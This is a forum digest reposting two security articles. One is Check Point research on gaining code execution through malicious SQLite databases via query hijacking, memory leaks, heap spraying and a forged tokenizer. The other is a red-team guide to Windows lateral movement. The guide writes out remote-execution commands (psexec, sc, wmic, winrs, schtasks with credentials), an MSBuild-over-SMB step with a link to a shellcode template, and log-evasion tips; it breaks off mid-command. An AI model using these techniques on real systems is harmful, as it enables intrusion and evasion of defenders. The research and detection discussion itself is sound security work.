Showing content with the highest reputation on 08/19/19 in all areas

1. SELECT code_execution FROM * USING SQLite;

August 10, 2019
Gaining code execution using a malicious SQLite database
Research by: Omer Gull

tl;dr

SQLite is one of the most widely deployed pieces of software in the world. However, from a security perspective, it has only been examined through the narrow lens of WebSQL and browser exploitation. We believe that this is just the tip of the iceberg. In our long-term research, we experimented with the exploitation of memory corruption issues within SQLite without relying on any environment other than the SQL language. Using our innovative techniques of Query Hijacking and Query Oriented Programming, we proved it is possible to reliably exploit memory corruption issues in the SQLite engine. We demonstrate these techniques in a couple of real-world scenarios: pwning a password stealer backend server, and achieving iOS persistency with higher privileges. We hope that by releasing our research and methodology, the security research community will be inspired to continue examining SQLite in the countless scenarios where it is available. Given the fact that SQLite is practically built in to every major OS, desktop or mobile, the landscape of opportunities is endless. Furthermore, many of the primitives presented here are not exclusive to SQLite and can be ported to other SQL engines. Welcome to the brave new world of using the familiar Structured Query Language for exploitation primitives.

Motivation

This research started when omriher and I were looking at the leaked source code of some notorious password stealers. While there are plenty of password stealers out there (Azorult, Loki Bot, and Pony, to name a few), their modus operandi is mostly the same: a computer gets infected, and the malware either captures credentials as they are used or collects stored credentials maintained by various clients. It is not uncommon for client software to use SQLite databases for such purposes.
After the malware collects these SQLite files, it sends them to its C2 server, where they are parsed using PHP and stored in a collective database containing all of the stolen credentials. Skimming through the leaked source code of such password stealers, we started speculating about the attack surface described above. Can we leverage the load and query of an untrusted database to our advantage? Such capabilities could have much bigger implications in countless scenarios, as SQLite is one of the most widely deployed pieces of software out there. A surprisingly complex code base, available in almost any device imaginable, is all the motivation we needed, and so our journey began.

SQLite Intro

The chances are high that you are currently using SQLite, even if you are unaware of it. To quote its authors: SQLite is a C-language library that implements a small, fast, self-contained, high-reliability, full-featured, SQL database engine. SQLite is the most used database engine in the world. SQLite is built into all mobile phones and most computers and comes bundled inside countless other applications that people use every day. Unlike most other SQL databases, SQLite does not have a separate server process. SQLite reads and writes directly to ordinary disk files. A complete SQL database with multiple tables, indices, triggers, and views is contained within a single disk file.

Attack Surface

The following snippet is a fairly generic example of a password stealer backend. Given the fact that we control the database and its content, the attack surface available to us can be divided into two parts: the load and initial parsing of our database, and the SELECT query performed against it. The initial loading done by sqlite3_open is actually a very limited surface; it is basically a lot of setup and configuration code for opening the database. Our surface is mainly the header parsing, which is battle-tested against AFL. Things get more interesting as we start querying the database.
In the SQLite authors’ words: “The SELECT statement is the most complicated command in the SQL language.” Although we have no control over the query itself (as it is hardcoded in our target), studying the SELECT process carefully will prove beneficial in our quest for exploitation. As SQLite3 is a virtual machine, every SQL statement must first be compiled into a byte-code program using one of the sqlite3_prepare* routines. Among other operations, the prepare function walks and expands all SELECT subqueries. Part of this process is verifying that all relevant objects (like tables or views) actually exist and locating them in the master schema.

sqlite_master and DDL

Every SQLite database has a sqlite_master table that defines the schema for the database and all of its objects (such as tables, views, indices, etc.). The sqlite_master table is defined as: The part that is of special interest to us is the sql column. This field is the DDL (Data Definition Language) used to describe the object. In a sense, DDL commands are similar to C header files. DDL commands are used to define the structure, names, and types of the data containers within a database, just as a header file typically defines type definitions, structures, classes, and other data structures. These DDL statements actually appear in plain text if we inspect the database file. During query preparation, sqlite3LocateTable() attempts to find the in-memory structure that describes the table we are interested in querying. sqlite3LocateTable() reads the schema available in sqlite_master, and if this is the first time doing so, it also has a callback for every result that verifies the DDL statement is valid and builds the necessary internal data structures that describe the object in question.

DDL Patching

Learning about this preparation process, we asked: can we simply replace the DDL that appears in plain text within the file? If we could inject our own SQL into the file, perhaps we could affect its behaviour.
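The claim that DDL is stored in plain text is easy to verify with Python's built-in sqlite3 module. A minimal sketch (the file path and the table name `dummy` are arbitrary, chosen to mirror the article's example):

```python
import os
import sqlite3
import tempfile

# A throwaway database with one table; names here are arbitrary.
path = os.path.join(tempfile.mkdtemp(), "demo.db")
con = sqlite3.connect(path)
con.execute("CREATE TABLE dummy (header TEXT, value TEXT)")
con.commit()
con.close()

# The DDL is stored verbatim in the sql column of sqlite_master...
con = sqlite3.connect(path)
ddl = con.execute(
    "SELECT sql FROM sqlite_master WHERE name = 'dummy'"
).fetchone()[0]
print(ddl)  # CREATE TABLE dummy (header TEXT, value TEXT)
con.close()

# ...and therefore also as plain text inside the raw file bytes,
# which is exactly what makes byte-level DDL patching feasible.
raw = open(path, "rb").read()
assert b"CREATE TABLE dummy" in raw
```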
Based on the code snippet above, it seems that DDL statements must begin with “create ”. With this limitation in mind, we needed to assess our surface. Checking SQLite’s documentation revealed the possible objects we can create. The CREATE VIEW command gave us an interesting idea. To put it very simply, VIEWs are just pre-packaged SELECT statements. If we replace the table expected by the target software with a compatible VIEW, interesting opportunities reveal themselves.

Hijack Any Query

Imagine the following scenario: the original database has a single TABLE called dummy that is defined as: The target software queries it with the following: We can actually hijack this query if we craft dummy as a VIEW. This “trap” VIEW enables us to hijack the query – meaning we generate a completely new query that we totally control. This nuance greatly expands our attack surface: from the very minimal parsing of the header and an uncontrollable query performed by the loading software, to the point where we can now interact with vast parts of the SQLite interpreter by patching the DDL and creating our own views with sub-queries. Now that we can interact with the SQLite interpreter, our next question was: what exploitation primitives are built into SQLite? Does it allow any system commands, or reading from and writing to the filesystem? As we are not the first to notice the huge SQLite potential from an exploitation perspective, it makes sense to review prior work done in the field. We started from the very basics.

SQL Injections

As researchers, it’s hard for us to even spell SQL without the “i”, so it seems like a reasonable place to start. After all, we want to familiarize ourselves with the internal primitives offered by SQLite. Are there any system commands? Can we load arbitrary libraries?
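The trap-VIEW idea can be sketched end to end with two sqlite3 connections. This skips the byte-level DDL patching step the article describes and simply builds the malicious database directly; the names `dummy` and `content` follow the article's example and the hijacked output string is invented for the demo:

```python
import os
import sqlite3
import tempfile

path = os.path.join(tempfile.mkdtemp(), "trap.db")

# Attacker side: the object named "dummy" is a trap VIEW, not a TABLE.
atk = sqlite3.connect(path)
atk.execute(
    "CREATE VIEW dummy AS "
    "SELECT 'hijacked, running on SQLite ' || sqlite_version() AS content"
)
atk.commit()
atk.close()

# Victim side: a hardcoded query against what it believes is a plain
# table. The trap VIEW answers instead, with a query we fully control.
victim = sqlite3.connect(path)
(result,) = victim.execute("SELECT content FROM dummy").fetchone()
victim.close()
print(result)
```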
It seems that the most straightforward trick involves attaching a new database file and writing to it using something along the lines of: We attach a new database, create a single table, and insert a single line of text. The new database then creates a new file (as databases are files in SQLite) with our web shell inside it. The very forgiving nature of the PHP interpreter parses our database until it reaches the PHP open tag of “<?”. Writing a webshell is definitely a win in our password stealer scenario; however, as you recall, DDL cannot begin with “ATTACH”. Another relevant option is the load_extension function. While this function should allow us to load an arbitrary shared object, it is disabled by default.

Memory Corruptions In SQLite

Like any other software written in C, memory safety issues are definitely something to consider when assessing the security of SQLite. In his great blog post, Michał Zalewski described how he fuzzed SQLite with AFL to achieve some impressive results: 22 bugs in just 30 minutes of fuzzing. Interestingly, SQLite has since started using AFL as an integral part of its remarkable test suite. These memory corruptions were all treated with the expected gravity (Richard Hipp and his team deserve tons of respect). However, from an attacker’s perspective, these bugs would prove a difficult path to exploitation without a decent framework to leverage them. Modern mitigations pose a major obstacle to exploiting memory corruption issues, and attackers need to find a more flexible environment. The security research community would soon find the perfect target!

Web SQL

Web SQL Database is a web page API for storing data in databases that can be queried using a variant of SQL through JavaScript. The W3C Web Applications Working Group ceased working on the specification in November 2010, citing a lack of independent implementations other than SQLite. Currently, the API is still supported by Google Chrome, Opera, and Safari.
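The ATTACH trick is easy to reproduce from Python. A sketch, with the destination path invented for the demo (on a real PHP backend it would be a web-accessible path such as a file under the document root):

```python
import os
import sqlite3
import tempfile

# Hypothetical destination; in the real attack this would be a
# web-served path so PHP executes the embedded tag.
shell_path = os.path.join(tempfile.mkdtemp(), "shell.php")

con = sqlite3.connect(":memory:")
# ATTACH creates a brand-new database file at the given path.
con.execute("ATTACH DATABASE ? AS shell", (shell_path,))
con.execute("CREATE TABLE shell.pwn (dataz TEXT)")
con.execute("INSERT INTO shell.pwn VALUES (?)",
            ("<? system($_GET['cmd']); ?>",))
con.commit()
con.close()

# The attached database is an ordinary file on disk; our PHP open tag
# sits verbatim inside it, surrounded by SQLite's binary page format.
raw = open(shell_path, "rb").read()
print(raw[:16])  # SQLite file header
assert b"<? system($_GET['cmd']); ?>" in raw
```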
All of them use SQLite as the backend of this API. Untrusted input into SQLite, reachable from any website inside some of the most popular browsers, caught the security community’s attention, and as a result the number of vulnerabilities began to rise. Suddenly, bugs in SQLite could be leveraged by the JavaScript interpreter to achieve reliable browser exploitation. Several impressive research reports have been published:

Low-hanging fruit like CVE-2015-7036 – untrusted pointer dereference in fts3_tokenizer()
More complex exploits presented at Black Hat 17 by the Chaitin team – type confusion in fts3OptimizeFunc()
The recent Magellan bugs exploited by Exodus – integer overflow in fts3SegReaderNext()

A clear pattern in past WebSQL research reveals that a virtual table module named “FTS” might be an interesting target for our research.

FTS

Full-Text Search (FTS) is a virtual table module that allows textual searches on a set of documents. From the perspective of an SQL statement, the virtual table object looks like any other table or view. But behind the scenes, queries on a virtual table invoke callback methods on shadow tables instead of the usual reading and writing on the database file. Some virtual table implementations, like FTS, make use of real (non-virtual) database tables to store content. For example, when a string is inserted into the FTS3 virtual table, some metadata must be generated to allow for an efficient textual search. This metadata is ultimately stored in real tables named “%_segdir” and “%_segments”, while the content itself is stored in “%_content”, where “%” is the name of the original virtual table. These auxiliary real tables that contain data for a virtual table are called “shadow tables”. Due to their trusting nature, interfaces that pass data between shadow tables provide a fertile ground for bugs. CVE-2019-8457, a new OOB read vulnerability we found in the RTREE virtual table module, demonstrates this well.
RTREE virtual tables, used for geographical indexing, are expected to begin with an integer column. Therefore, other RTREE interfaces expect the first column in an RTREE to be an integer. However, if we create a table where the first column is a string, as shown in the figure below, and pass it to the rtreenode() interface, an OOB read occurs. Now that we can use query hijacking to gain control over a query, and know where to find vulnerabilities, it’s time to move on to exploit development.

SQLite Internals For Exploit Development

Previous publications on SQLite exploitation clearly show that there has always been a need for a wrapping environment, whether it is the PHP interpreter seen in this awesome blog post on abusing SQLite tokenizers or the more recent work on Web SQL from the comfort of a JavaScript interpreter. As SQLite is pretty much everywhere, limiting its exploitation potential sounded like low-balling to us, so we started exploring the use of SQLite internals for exploitation purposes. The research community has become pretty good at utilizing JavaScript for exploit development. Can we achieve similar primitives with SQL? Bearing in mind that SQL is Turing complete ([1], [2]), we created a primitive wish-list for exploit development based on our pwning experience. A modern exploit written purely in SQL should have the following capabilities:

Memory leak.
Packing and unpacking of integers to 64-bit pointers.
Pointer arithmetic.
Crafting complex fake objects in memory.
Heap spray.

One by one, we will tackle these primitives and implement them using nothing but SQL. For the purpose of achieving RCE on PHP7, we will utilize the still-unfixed 1-day CVE-2015-7036. Wait, what? How come a 4-year-old bug has never been fixed? It is actually an interesting story and a great example of our argument.
This feature was only ever considered vulnerable in the context of a program that allows arbitrary SQL from an untrusted source (Web SQL), and so it was mitigated accordingly. However, SQLite usage is so versatile that we can actually still trigger it in many scenarios 🙂

Exploitation Game-plan

CVE-2015-7036 is a very convenient bug to work with. In a nutshell, the vulnerable fts3_tokenizer() function returns the tokenizer address when called with a single argument (like “simple”, “porter”, or any other registered tokenizer). When called with two arguments, fts3_tokenizer() overrides the tokenizer address named by the first argument with the address provided by a blob in the second argument. After a certain tokenizer has been overridden, any new instance of an fts table that uses this tokenizer allows us to hijack the flow of the program. Our exploitation game-plan:

Leak a tokenizer address
Compute the base address
Forge a fake tokenizer that will execute our malicious code
Override one of the tokenizers with our malicious tokenizer
Instantiate an fts3 table to trigger our malicious code

Now back to our exploit development.

Query Oriented Programming ©

We are proud to present our own unique approach to exploit development using the familiar Structured Query Language. We share QOP with the community in the hope of encouraging researchers to pursue the endless possibilities of database engine exploitation. Each of the following primitives is accompanied by an example from the sqlite3 shell. While this will give you a hint of what we want to achieve, keep in mind that our end goal is to plant all of these primitives in the sqlite_master table and hijack the queries issued by the target software that loads and queries our malicious SQLite db file.

Memory Leak – Binary

Mitigations such as ASLR definitely raised the bar for memory corruption exploitation. A common way to defeat them is to learn something about the memory layout around us. This is widely known as a memory leak.
Memory leaks are their own sub-class of vulnerabilities, and each one has a slightly different setup. In our case, the leak is the return of a BLOB by SQLite. These BLOBs make a fine leak target, as they sometimes hold memory pointers. The vulnerable fts3_tokenizer() is called with a single argument and returns the memory address of the requested tokenizer. hex() makes it readable by humans. We obviously get some memory address, but it is reversed due to little-endianness. Surely we can flip it using some SQLite built-in string operations; substr() seems to be a perfect fit! We can read little-endian BLOBs, but this raises another question: how do we store things?

QOP Chain

Naturally, storing data in SQL requires an INSERT statement. Due to the hardened verification of sqlite_master, we can’t use INSERT, as all of the statements must start with “CREATE ”. Our approach to this challenge is to simply store our queries under a meaningful VIEW and chain them together. The following example makes it a bit clearer: This might not seem like a big difference, but as our chain gets more complicated, being able to use pseudo-variables will surely make our life easier.

Unpacking of 64-bit pointers

If you’ve ever done any pwning challenges, the concept of packing and unpacking pointers should not be foreign. This primitive should make it easy to convert our hexadecimal values (like the leak we just achieved) to integers. Doing so allows us to perform various calculations on these pointers in the next steps. This query iterates over a hexadecimal string char by char in reversed fashion using substr(). Translation of each char is done using a clever trick with instr(), which is 1-based. All that is needed now is the proper shift, on the right of the * sign.

Pointer arithmetic

Pointer arithmetic is a fairly easy task with integers at hand.
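The flip-and-fold idea can be reproduced in pure SQL. The query below is a sketch of the described primitive, not the exact QOP query from the post: it reverses the little-endian hex string two characters at a time with substr(), then folds the digits into an integer using the 1-based instr() trick. The "leaked" value is made up for the demo:

```python
import sqlite3

con = sqlite3.connect(":memory:")

# Stand-in for hex(fts3_tokenizer('simple')): little-endian bytes
# e0 2f dd d6 86 55 00 00, i.e. the value 0x5586d6dd2fe0.
leak = "E02FDDD686550000"

query = """
WITH RECURSIVE
  be(i, s) AS (          -- rebuild big-endian order, two chars at a time
    SELECT length(:h), ''
    UNION ALL
    SELECT i - 2, s || substr(:h, i - 1, 2) FROM be WHERE i > 0
  ),
  hexstr(s) AS (SELECT s FROM be WHERE i = 0),
  num(j, val) AS (       -- fold digits: val = val*16 + digit
    SELECT 0, 0
    UNION ALL
    SELECT j + 1,
           val * 16
           + instr('0123456789ABCDEF',
                   substr((SELECT s FROM hexstr), j + 1, 1)) - 1
    FROM num WHERE j < length(:h)
  )
SELECT val FROM num ORDER BY j DESC LIMIT 1
"""
(ptr,) = con.execute(query, {"h": leak}).fetchone()
print(hex(ptr))  # 0x5586d6dd2fe0
```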
For example, extracting the image base from our leaked tokenizer pointer is as easy as:

Packing of 64-bit pointers

After reading leaked pointers and manipulating them to our will, it makes sense to pack them back into their little-endian form so we can write them somewhere. SQLite’s char() should be of use here, as its documentation states that it will “return a string composed of characters having the Unicode code point values of an integer.” It proved to work fairly well, but only on a limited range of integers; larger integers were translated to their 2-byte code-points. After banging our heads against the SQLite documentation, we suddenly had a strange epiphany: our exploit is actually a database. We can prepare, beforehand, a table that maps integers to their expected values. Now our pointer packing query is the following:

Crafting complex fake objects in memory

Writing a single pointer is definitely useful, but still not enough. Many memory-safety exploitation scenarios require the attacker to forge some object or structure in memory, or even write a ROP chain. Essentially, we string together several of the building blocks we presented earlier. For example, let’s forge our own tokenizer, as explained here. Our fake tokenizer should conform to the interface expected by SQLite, defined here: Using the methods described above and a simple JOIN query, we are able to fake the desired object quite easily. Verifying the result in a low-level debugger, we see that indeed a fake tokenizer object was created.

Heap Spray

Now that we have crafted our fake object, it is sometimes useful to spray the heap with it. Ideally this is some repetitive form of the latter. Unfortunately, SQLite does not implement the REPEAT() function like MySQL. However, this thread gave us an elegant solution: the zeroblob(N) function returns a BLOB consisting of N bytes, while we use replace() to replace those zeros with our fake object.
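Both halves can be sketched in SQL without the precomputed byte table: printf()/group_concat() emit the little-endian byte order for packing, and zeroblob()/replace() repeat a value for the spray. This is a hex-text approximation of the technique (the real exploit operates on raw BLOBs, and the pointer value here is invented):

```python
import sqlite3

con = sqlite3.connect(":memory:")

# Packing sketch: emit a 64-bit value's bytes in little-endian order as
# hex text, one byte per recursion step.
pack_sql = """
WITH RECURSIVE k(i) AS (SELECT 0 UNION ALL SELECT i + 1 FROM k WHERE i < 7)
SELECT group_concat(printf('%02X', (:p >> (8 * i)) & 255), '') FROM k
"""
(packed,) = con.execute(pack_sql, {"p": 0x5586D6DD2FE0}).fetchone()
print(packed)  # E02FDDD686550000

# Spray sketch: hex(zeroblob(8)) is eight '00' pairs; replace() stamps
# our fake-object bytes over every pair, repeating it eight times.
(spray,) = con.execute(
    "SELECT replace(hex(zeroblob(8)), '00', '4141414141414149')"
).fetchone()
print(spray[:16], "repeated", len(spray) // 16, "times")
```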
Searching for those 0x41s shows we also achieved perfect consistency. Notice the repetition every 0x20 bytes.

Memory Leak – Heap

Looking at our exploitation game plan, it seems like we are moving in the right direction. We already know where the binary image is located, we were able to deduce where the necessary functions are, and we can spray the heap with our malicious tokenizer. Now it’s time to override a tokenizer with one of our sprayed objects. However, as the heap address is also randomized, we don’t know where our spray is allocated. A heap leak requires us to have another vulnerability. Again, we target a virtual table interface. As virtual tables use underlying shadow tables, it is quite common for them to pass raw pointers between different SQL interfaces. Note: this exact type of issue was mitigated in SQLite 3.20. Fortunately, PHP7 is compiled with an earlier version. In the case of an updated version, CVE-2019-8457 could be used here as well. To leak the heap address, we need to generate an fts3 table beforehand and abuse its MATCH interface. Just as we saw in our first memory leak, the pointer is little-endian, so it needs to be reversed. Fortunately, we already know how to do so using substr(). Now that we know our heap location and can spray properly, we can finally override a tokenizer with our malicious one!

Putting It All Together

With all the desired exploitation primitives at hand, it’s time to go back to where we started: exploiting a password stealer C2. As explained above, we need to set up a “trap” VIEW to kick-start our exploit. Therefore, we need to examine our target and prepare the right VIEW. As seen in the snippet above, our target expects our db to have a table called Notes with a column called BodyRich inside it. To hijack this query, we created the following VIEW. After Notes is queried, 3 QOP chains execute. Let’s analyze the first one of them.
heap_spray

Our first QOP chain should populate the heap with a large number of our malicious tokenizers. p64_simple_create, p64_simple_destroy, and p64_system are essentially all chains achieved with our leak and packing capabilities. For example, p64_simple_create is constructed as: As these chains get pretty complex pretty fast, and are quite repetitive, we created QOP.py. QOP.py makes things a bit simpler by generating these queries in pwntools style. Creating the previous statements becomes as easy as:

Demo

COMMIT; Now that we have established a framework to exploit any situation where the querier cannot be sure that the database is non-malicious, let’s explore another interesting use case for SQLite exploitation.

iOS Persistency

Persistency is hard to achieve on iOS, as all executable files must be signed as part of Apple’s Secure Boot. Luckily for us, SQLite databases are not signed. Utilizing our new capabilities, we will replace one of the commonly used databases with a malicious version. After the device reboots and our malicious database is queried, we gain code execution. To demonstrate this concept, we replace the Contacts DB “AddressBook.sqlitedb”. As in our PHP7 exploit, we create two extra DDL statements: one overrides the default tokenizer “simple”, and the other triggers the crash by trying to instantiate the overridden tokenizer. Now, all we have to do is rewrite every table of the original database as a view that hijacks any query performed and redirects it toward our malicious DDL. Replacing the contacts db with our malicious version and rebooting results in the following iOS crashdump: As expected, the contacts process crashed at 0x4141414141414149, where it expected to find the xCreate constructor of our fake tokenizer. Furthermore, the contacts db is actually shared among many processes. Contacts, FaceTime, SpringBoard, WhatsApp, Telegram, and XPCProxy are just some of the processes querying it.
Some of these processes are more privileged than others. Once we proved that we can execute code in the context of the querying process, this technique also allows us to expand and elevate our privileges. Our research and methodology have been responsibly disclosed to Apple and were assigned the following CVEs: CVE-2019-8600, CVE-2019-8598, CVE-2019-8602, CVE-2019-8577.

Future Work

Given the fact that SQLite is practically built in to almost any platform, we think that we’ve barely scratched the tip of the iceberg when it comes to its exploitation potential. We hope that the security community will take this innovative research and the tools released and push it even further. A couple of options we think might be interesting to pursue:

Creating more versatile exploits. This can be done by building exploits dynamically, choosing the relevant QOP gadgets from pre-made tables using functions such as sqlite_version() or sqlite_compileoption_used().
Achieving stronger exploitation primitives, such as arbitrary R/W.
Looking for other scenarios where the querier cannot verify the database's trustworthiness.

Conclusion

We established that simply querying a database may not be as safe as you expect. Using our innovative techniques of Query Hijacking and Query Oriented Programming, we proved that memory corruption issues in SQLite can now be reliably exploited. As our permission hierarchies become more segmented than ever, it is clear that we must rethink the boundaries of trusted/untrusted SQL input. To demonstrate these concepts, we achieved remote code execution on a password stealer backend running PHP7 and gained persistency with higher privileges on iOS. We believe that these are just a couple of use cases in the endless landscape of SQLite. Check Point IPS protects against this threat: “SQLite fts3_tokenizer Untrusted Pointer Remote Code Execution (CVE-2019-8602).”

Source: https://research.checkpoint.com/select-code_execution-from-using-sqlite/
2. Offensive Lateral Movement

Hausec Infosec
August 12, 2019
12 Minutes

Lateral movement is the process of moving from one compromised host to another. Penetration testers and red teamers alike have commonly accomplished this by executing powershell.exe to run a base64-encoded command on the remote host, which would return a beacon. The problem with this is that offensive PowerShell is no longer a new concept; even moderately mature shops will detect it and shut it down quickly, and any half-decent AV product will kill it before a malicious command is run. The difficulty with lateral movement is doing it with good operational security (OpSec), which means generating as few logs as possible, or generating logs that look normal, i.e. hiding in plain sight to avoid detection. The purpose here is not only to show the techniques, but to show what is happening under the hood and any indicators associated with them. I’ll be referencing some Cobalt Strike syntax throughout this post, as it’s what we primarily use for C2; however, Cobalt Strike’s built-in lateral movement techniques are quite noisy and not OpSec friendly. In addition, I understand not everyone has Cobalt Strike, so Meterpreter is also referenced in most examples, but the techniques are universal. There are several different lateral movement techniques out there, and I’ll try to cover the big ones and how they work from a high-level overview, but before covering the methods, let’s clarify a few terms.

Named Pipe: A way that processes communicate with each other via SMB (TCP 445). Operates on Layer 5 of the OSI model. Similar to how a port can listen for connections, a named pipe can also listen for requests.

Access Token: Per Microsoft’s documentation: an access token is an object that describes the security context of a process or thread. The information in a token includes the identity and privileges of the user account associated with the process or thread.
When a user logs on, the system verifies the user’s password by comparing it with information stored in a security database. When the user’s credentials are authenticated, the system produces an access token. Every process executed on behalf of this user has a copy of this access token. Put another way, it contains your identity and states what you can and can’t use on the system. Without diving too deep into Windows authentication, access tokens reference logon sessions, which are created when a user logs into Windows.

Network Logon (Type 3): Network logons occur when an account authenticates to a remote system/service. During network authentication, reusable credentials are not sent to the remote system. Consequently, when a user logs into a remote system via a network logon, the user’s credentials will not be present on the remote system to perform further authentication. This brings in the double-hop problem: if we have a one-liner that connects to one target via network logon, and that target then also reaches out via SMB, no credentials are present to log in over SMB, so the login fails. Examples are shown further below.

PsExec

PsExec comes from Microsoft’s Sysinternals suite and allows users to execute processes on remote hosts over port 445 (SMB) using named pipes. It first connects to the ADMIN$ share on the target over SMB, uploads PSEXESVC.exe, and uses the Service Control Manager to start the .exe, which creates a named pipe on the remote system; it then uses that pipe for I/O. An example of the syntax is the following:

psexec \\test.domain -u Domain\User -p Password ipconfig

Cobalt Strike (CS) goes about this slightly differently.
It first creates a PowerShell script that base64-encodes an embedded payload which runs from memory and is compressed into a one-liner, connects to the ADMIN$ or C$ share, and runs the PowerShell command, as shown below. The problem with this is that it creates a service and runs a base64-encoded command, which is not normal and will set off all sorts of alerts and generate logs. In addition, the commands are sent through named pipes, which have a default name in CS (though it can be changed). Red Canary wrote a great article on detecting it. Cobalt Strike has two PsExec built-ins: one called PsExec and the other called PsExec (psh). The difference between the two, despite what the CS documentation says, is that PsExec (psh) calls Powershell.exe, so your beacon will be running as a Powershell.exe process, whereas PsExec without the (psh) will be running as rundll32.exe. Viewing the process IDs via Cobalt Strike: By default, PsExec will spawn the rundll32.exe process to run from. It’s not dropping a DLL to disk or anything, so from a blue-team perspective, if rundll32.exe is running without arguments, it’s VERY suspicious.

SC

Service Controller is exactly what it sounds like — it controls services. This is particularly useful as an attacker because creating and starting services is possible over SMB, so the syntax for starting a remote service is:

sc \\host.domain create ExampleService binpath= “c:\windows\system32\calc.exe”
sc \\host.domain start ExampleService

The only caveat is that the executable must specifically be a service binary. Service binaries are different in the sense that they must “check in” to the Service Control Manager (SCM); if a binary doesn’t, it exits execution. So if a non-service binary is used here, it will come back as an agent/beacon for a second, then die.
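The "base64-encoded command" these tools hand to powershell.exe via -EncodedCommand is base64 over the UTF-16LE bytes of the script, not plain ASCII, which is a common stumbling block when crafting or decoding such one-liners by hand. A quick sketch (the command itself is a harmless placeholder):

```python
import base64

# Placeholder command; -EncodedCommand expects base64 of the UTF-16LE
# (not ASCII/UTF-8) encoding of the script text.
cmd = "Write-Output 'hello'"
enc = base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")
one_liner = f"powershell.exe -NoP -NonI -W Hidden -Enc {enc}"
print(one_liner)

# Decoding it back is exactly how defenders recover the original
# command from process-creation logs.
decoded = base64.b64decode(enc).decode("utf-16-le")
assert decoded == cmd
```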
In CS, you can specifically craft service executables: Generating a service executable via Cobalt Strike. Here is the same attack but with Metasploit:

WMI

Windows Management Instrumentation (WMI) is built into Windows to allow remote access to Windows components via the WMI service. Communicating using Remote Procedure Calls (RPCs) over port 135 for remote access (and an ephemeral port later), it allows system admins to perform automated administrative tasks remotely, e.g. starting a service or executing a command remotely. It can be interacted with directly via wmic.exe. An example WMI query looks like this:

wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe”

Cobalt Strike leverages WMI to execute a PowerShell payload on the target, so PowerShell.exe is going to open when using the WMI built-in, which is an OpSec problem because of the base64-encoded payload that executes. So we see that even through WMI, a named pipe is created, despite wmic.exe having the capability to run commands on the target via PowerShell, so why create a named pipe in the first place? The named pipe isn’t necessary for executing the payload; however, the payload CS creates uses the named pipe for communication (over SMB). This is just touching the surface of the capabilities of WMI. My co-worker @mattifestation gave an excellent talk during Black Hat 2015 on its capabilities, which can be read here.

WinRM

Windows Remote Management allows management of server hardware, and it’s also Microsoft’s way of using WMI over HTTP(S). Unlike traditional web traffic, it doesn’t use 80/443; instead it uses 5985 (HTTP) and 5986 (HTTPS). WinRM comes installed with Windows by default but does need some setup in order to be used. The exception to this is server OSs, where it’s on by default since 2012 R2. WinRM requires listeners (sound familiar?)
on the client, and even if the WinRM service is started, a listener has to be present in order for it to process requests. This can be done via the following command in Powershell, or remotely via WMI and Powershell:

Enable-PSRemoting -Force

From a non-CS perspective (replace calc.exe with your binary):

winrs -r:EXAMPLE.lab.local -u:DOMAIN\user -p:password calc.exe

Executing with CobaltStrike:

The problem with this, of course, is that it has to be started with PowerShell; if you're talking in remote terms, then it needs to be done via DCOM or WMI. While opening up PowerShell is not weird and starting a WinRM listener might fly under the radar, the noisy part comes when executing the payload, as there's an indicator when running the built-in WinRM module from Cobalt Strike:

"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

SchTasks

SchTasks is short for Scheduled Tasks. It operates over port 135 initially and then continues communication over an ephemeral port, using DCE/RPC. Similar to creating a cron job in Linux, you can schedule a task to occur and execute whatever you want. From just PS:

schtasks /create /tn ExampleTask /tr c:\windows\system32\calc.exe /sc once /st 00:00 /S host.domain /RU System
schtasks /run /tn ExampleTask /S host.domain
schtasks /F /delete /tn ExampleTask /S host.domain

In CobaltStrike:

shell schtasks /create /tn ExampleTask /tr c:\windows\system32\calc.exe /sc once /st 00:00 /S host.domain /RU System
shell schtasks /run /tn ExampleTask /S host.domain

Then delete the job (opsec!):

shell schtasks /F /delete /tn ExampleTask /S host.domain

MSBuild

While not a lateral movement technique, it was discovered in 2016 by Casey Smith that MSBuild.exe can be used in conjunction with some of the above methods in order to avoid dropping encoded Powershell commands or spawning cmd.exe.
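For reference, MSBuild project files of this kind follow the inline-task shape below. This is a benign sketch only: the task name, target name, and logged message are illustrative and are not taken from the linked shellcode template, which embeds a payload in the same structure.

```xml
<!-- Benign sketch of an MSBuild inline-task project file.
     Built with: MSBuild.exe thisfile.xml -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Example">
    <ExampleTask />
  </Target>
  <UsingTask TaskName="ExampleTask" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;
          // The inline C# class is compiled and run by MSBuild itself,
          // which is why no cmd.exe or powershell.exe ever spawns.
          public class ExampleTask : Task {
              public override bool Execute() {
                  Log.LogMessage("running from inside MSBuild");
                  return true;
              }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
```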
MSBuild.exe is a Microsoft signed executable that comes installed with the .NET framework package. MSBuild is used to compile/build C# applications via an XML file which provides the schema. From an attacker's perspective, it can be used to compile C# code to generate malicious binaries or payloads, or even run a payload straight from an XML file. MSBuild can also compile over SMB, as shown in the syntax below:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe \\host.domain\path\to\XMLfile.xml

XML Template: https://gist.githubusercontent.com/ConsciousHacker/5fce0343f29085cd9fba466974e43f17/raw/df62c7256701d486fcd1e063487f24b599658a7b/shellcode.xml

What doesn't work:

wmic /node:LABWIN10.lab.local /user:LAB\Administrator /password:Password! process call create "c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe \\LAB2012DC01.LAB.local\C$\Windows\Temp\build.xml"

Trying to use wmic to call msbuild.exe to build an XML over SMB fails because of the double-hop problem. The double-hop problem occurs when a network logon (type 3) is used, meaning credentials are never actually sent to the remote host. Since the credentials aren't sent to the remote host, the remote host has no way of authenticating back to the payload-hosting server. In Cobalt Strike, this is often experienced while using wmic, and the workaround is to make a token for that user, so the credentials can then be passed on from that host. Without CS, however, there are a few options to get around this:

Locally host the XML file (drop to disk):

copy C:\Users\Administrator\Downloads\build.xml \\LABWIN10.lab.local\C$\Windows\Temp\
wmic /node:LABWIN10.lab.local /user:LAB\Administrator /password:Password!
